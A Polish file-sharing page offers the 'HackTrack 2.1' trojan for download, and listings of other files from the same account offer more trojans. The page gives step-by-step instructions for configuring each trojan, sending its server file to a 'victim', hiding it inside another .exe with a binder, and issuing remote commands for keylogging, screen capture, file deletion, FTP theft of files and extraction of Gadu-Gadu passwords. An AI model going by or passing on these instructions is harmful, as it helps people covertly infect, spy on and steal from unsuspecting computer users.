Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

HackTrack 2.1.zip

jawijk / programy / Hacker / HackTrack 2.1.zip
Download: HackTrack 2.1.zip

2,23 MB

0.0 / 5 (0 głosów)
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "HackTrack 2.1"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"ASPack.exe", "Konfigurator.exe", "Usówacz.exe", "Wygaszacz.exe"
3. Najpierw odpalamy plik "Konfigurator.exe". Uruchamia się aplikacja widziana na screenie, która służy do odpowiedniej konfiguracji trojana:
obrazek
Uzupełniamy wszystkie ramki odpowiednimi danymi i klikamy na opcję "Zapisz"
4. Teraz wysyłamy plik "Wygaszacz.exe" do naszej ofiary. Plik ten jest serwerem trojana. Ofiara musi go otworzyć.
5. Teraz otwieramy program Gadu-Gadu i wysyłamy którąś z poniższych komend na numer serwera.

Komendy:
Info- Informacje o serverze
screen - wysyła screena(obraz pulpitu ofiary)
open -otwieranie CD
close -zamykanie CD
procesy --uruchomione procesy
voice --uruchamia syntezator mowy na jedno słowo.np. wyslij "voice"
a potem "fuck you"
key - keylogger(wysyła litery które ofiara wpisała na klawiatórze)
kolory - odwraca kolory na ekranie (fajny efekt)
6. Acha. Plik "ASPack.exe" jest to program bindujący. Screen:
obrazek
Służy on do połączenie pliku serwera z dowolnym innym posiadającym rozszerzenie .exe

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Obsługa programu: 1. Ściągamy plik Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy dwa pliki: -acessor.exe (jest to plik client) -aserver.exe (jest to plik serwer) 2. Plik aserver.exe wysyłamy do naszej ofiary. 3. My zaś otwieramy plik acessor.exe. Uruchomi się program widziany na screenshocie. Za jego pomocą połączymy się z zainfekowanym komputerem. Podajemy HOST ofiary (który bez problemu ustalimy za pomocą jej adresu IP ) i klikamy na opcję Conectar (czyli połącz). To wszystko :) obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Prosiak 0.70 beta 7" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "client.exe", "konfig.exe" 3. Odpalamy plik "konfig.exe". Uruchomi się aplikacja widziana na screenie: obrazek Dzięki niej stworzymy i odpowiednio skonfigurujemy serwer trojana. Kiedy wszystko poprawnie wpisaliśmy klikamy na opcję "Zapisz" 4. Teraz plik serwer (który utworzyliśmy) wysyłamy do naszej ofiary. Ofiara musi go otworzyć. 5. My zaś otwieramy plik "client.exe". Uruchamia się aplikacja widziana na screenie: obrazek Podajemy adres IP naszej ofiary, port i hasło jakie wpisaliśmy w "konfig.exe" do naszego backdoora. No i się łączymy z jej kompem ;]
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Snape 1.2" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: klient.exe, server.exe 3. Plik o nazwie serwer.exe podrzucamy naszej ofiarze. 4. My zaś otwieramy plik klient.exe, klikamy na zakładkę "Połączenie", w której podajemy adres IP ofiary i klikamy na "Połącz" obrazekobrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "LanSpy 1.0" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "LanSpy.exe", "Server.exe" 3. Plik "Server.exe" podrzucamy swojej ofiarze, która musi ten plik otworzyć ;] 4. My zaś otwieramy plik "LanSpy.exe". Uruchami się aplikacja widziana na screenie, w której podajesz IP ofiary i się łączysz: obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Konik 0.7 Beta" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "Install.exe" 3. Odpalamy plik "Install.exe"rozpocznie się instalacja programu: obrazek4. Po instalacji wchodzimy do folderu w którym zainstalowaliśmy program i widzimy następujące pliki: "Config.exe", "klient_konik.exe", "server.exe" 5. Najpierw odpalamy plik "Config.exe". Uruchamia się aplikacja widziana na screenie: obrazek Służy ona do odpowiedniego skonfigurowania serwera trojana. Gdy już wszystko poprawnie ustawimy klikamy na opcję "Zapisz" 6. Teraz wysyłamy plik "serwer.exe" do naszej ofiary. Ona zaś musi go otworzyć. 7. Następnie otwieramy plik "klient_konik.exe". Uruchamia się aplikacja widziana na screenie, w której podajemy adres IP ofiary i klikamy na opcję "Connect" obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "GregStar Trojan 2.2" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: "GST 2.2 - Konfigurator.exe" Zakładka Połączenia: Numer GG Serwera - zakładamy nowy nr gg ( Wpisujemy go w Numer GG Serwera ) Hasło - Tutaj podajemy hasło które wpisaliśmy zakładając nowy nr gg (hasło do tego nr powyżej) Numer GG Klienta - Tutaj podajemy swój nr gg którego używamy na co dzień, Przez ten nr GG będą wysyłane komendy i odbierane informacje Zakładka Ftp: Jeśli nie posiadasz konta ftp to załóż je sobie np. na republice (www.republika.pl) Host - Tu podajemy Host naszego serwera ftp dla republiki to: ftp.republika.pl Login - tu wpisujemy nasz login do serwera ftp np. Karol Haslo - tu podajemy hasło do naszego serwera ftp np. Karol Zakładka Misc: Nazwa wpisu w rejestrze - Podajemy nazwę pod jaka serwer będzie wpisany w rejestrze Lokalizacja - Podajemy gdzie ma się serwer zainstalować Np. C:\Windows\Serwer.exe Komedy: info - pokazuje informacje o komputerze dir - przeglądanie folderu np. dir C:\ procesy - Wyświetlanie uruchomionych procesów kill - zabijanie wybranego procesu np. kill gg.exe reset - resetuje komputer poweroff - wyłącza komputer screen - zrzut ekranu (wymagany FTP) delfile - kasowanie wybranego pliku np. delfile C:\plik.exe deltree - kasowanie katalogu np. C:\katalog message - pokazuje wiadomość o danej treści np.message hello !!! hideclock - chowa zegar systemowy showclock - pokazuje zegar systemowy myszon - przemienia klawisze myszki myszoff - przywraca poprzedni stan klawiszy keyloggeron - Aktywuje keyloggera hdd - wyświetla wszystkie dyski keylogger - pokazuje zapisane klawisze keyloggeroff - De aktywuje keyloggera cmd - wykonanie polecenia systemowego np. cmd ping 127.0.0.1 powiedz - komputer wypowiada wpisane slowa np. powiedz Hello batch - po wpisaniu tego polecenia wpisuj komendy batch batchend - zapisuje wpisane komendy batch do pliku .bat chat - Uaktywnia czat z ofiara po słowie "chat" wpisujemy nick np. chat Zenek czatoff - De aktywuje czat deletegst - kasuje na stale serwer GST open - otwiera dany plik np. open C:\plik.exe hideopen - otwiera plik w trybie ukrytym end - zamyka polaczenie GST ietekst - zmienia tekst naglowka Internet Explorer np ietekst Internet Oxplorer iestartowa - zmienia strone startowa Internet Explorera np. iestartowa http://xlaski.pl ggcrack - wyciaga hasla z pliku config.dat np. ggcrack C:\program files\user\Ja1\config.dat uptime - pokazuje czas uruchomienia systemu obroc ekran - obraca ekran do "gory nogami" maxvol - ustawia glosnosc dzwieku na MAX Komendy FTP: ftpon - laczy z serwerem FTP ftpoff - rozlacza z serwerm FTP ftpadd - laduje plik na serwer FTP np. ftpadd C:\plik na dysku ofiary.exe ftpget - sciaga plik z serwera FTP np. ftpget plikNaFtp.exe ftpdel - kasuje plik na serwerze FTP np. ftpdel plik na serwerze ftp.exe ftplist - pokazuje wszystkie pliki na serwerze FTP config ftp - zdalna konfiguracja serwera FTP cfg klient - zmienia numer GG klienta np. cfg klient 123456 cfg load - Laduje konfiguracje z
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "GregStar Trojan 1.1" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "Klient.exe", "Konfig.exe", "Serwer.exe" 3. Najpierw odpalamy plik "Konfig.exe", dzięki któremu odpowiednio skonfigurujesz trojana. Uruchamia się program widziany na screenie: obrazek4. Następnie wysyłasz plik "Serwer" do swojej ofiary, która musi go otworzyć. 5. Teraz odpalasz plik "Klient" i łączysz się z kompem ofiary ;]
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "GG Control Tool 1.2" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: "GGControlToolv1.2.exe", "Serwer.exe" 3. Odpalamy plik "GGControlToolv1.2.exe". Uruchamia się aplikacja widziana na screenie: obrazek Uzupełniamy wszystkie ramki i klikamy na Generuj. Powstaje plik "Serwer", który wysyłamy do naszej ofiary. Ona zaś musi go otworzyć 4. Potem my otwieramy Gadu-Gadu i wysyłamy którąś z podanych komend na numer serwera ;] Komendy: help - pomoc, wyswietla komendy exit - wylacza server magnesik on - magnesik on magnesik off - magnesik off monitor off - wylacza monitor monitor on - wlacza monitor info - info o kompie screen - screenshot wysylany przez gg cmd on - aktywuje dostep do lini polecen (po wpisaniu tego nalezy normalnie wpisywac komendy dosa. Aby zobaczyc rezultat nalezy wyslac komende "z") cmd off - deaktywuje dostęp do lini poleceń ftp - wprowadza dane servera ftp na jaki ma być wyslany plik ftpsciezka - sciezka skad ma brac pliki domyslnie jest to c:\ ftpkolejny - pyta o nazwe pliku nastepnie sprawdza czy istnieje, jeżeli tak wysyla go na server. download - sciagnij plik z okreslonej lokalizacji pasek on - wlacza pasek startu pasek off - wylacza pasek startu wiadomosc - wiadomosc rysowana na monitorze wiadomosc2 - wiadomosc w postaci okienka komunikatu kolory - odwraca kolory na ekranie uninstall - usuwa calkowicie trojana cd open - otworz cd cd close - zamrozdzielczosc cd zmienia rozdzielczosc na wybrana
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "G@du-Ghost Trojan v2.2" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: "GGT.v.2.2_b.exe" 3. Odpalamy plik "GGT.v.2.2_b.exe". Uruchamia się program za pomocą którego stworzymy plik serwer. Sory że nie dałem screna :( 4. Następnie plik serwer który utworzyłeś podsyłasz do swojej ofiary. Ofiara musi ją otworzyć. Potem ty otwierasz program Gadu-Gadu i wykonujesz zdalne polecenia na kompie ofiary ;]
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "G@du-Ghost Trojan v2.0" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: "G@du-Ghost Trojan v2.0.exe" 3. Odpalamy plik "G@du-Ghost Trojan v2.0.exe". Uruchamia się program widziany na screenie: obrazek Następnie uzupełniamy wszystkie zakładki w cliencie: "Gadu-Gadu", "E-Mail", "Misc", "Generate" i tworzymy plik serwer, który później wysyłamy naszej ofiarze. 4. Ofiara musi odpalić plik który jej wysłałeś. Ty zaś otwierasz program Gadu-Gadu, który w tym przypadku jest clientem, za pomocą którego połączysz się z zainfekowanym kompem ofiary ;]
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności